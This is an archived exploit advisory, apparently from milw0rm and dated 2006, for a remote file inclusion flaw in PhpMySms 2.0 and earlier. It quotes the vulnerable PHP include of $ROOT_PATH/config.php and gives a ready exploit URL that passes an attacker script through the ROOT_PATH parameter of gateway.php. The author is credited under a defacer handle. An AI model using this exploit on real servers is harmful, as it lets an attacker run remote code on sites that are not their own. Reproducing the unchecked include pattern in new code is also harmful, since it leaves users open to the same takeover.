17 lines
504 B
Text
Executable file
17 lines
504 B
Text
Executable file
PhpMySms <= V2.0 (ROOT_PATH) Remote File Include Vulnerability
|
|
URL : Http://www.phpmysms.com
|
|
|
|
Author=Persian-Defacer
|
|
www.Hacking-Boys.com
|
|
==============================================================
|
|
if (($_POST[mode] == "1") or ($_GET[mode] == "1")) {
|
|
include ("config.php");
|
|
} else {
|
|
include ("$ROOT_PATH/config.php");
|
|
}
|
|
==============================================================
|
|
|
|
|
|
Exploit : http://[site]/[sms location]/sms_config/gateway.php?ROOT_PATH=[evil_script]
|
|
|
|
# milw0rm.com [2006-06-24]
|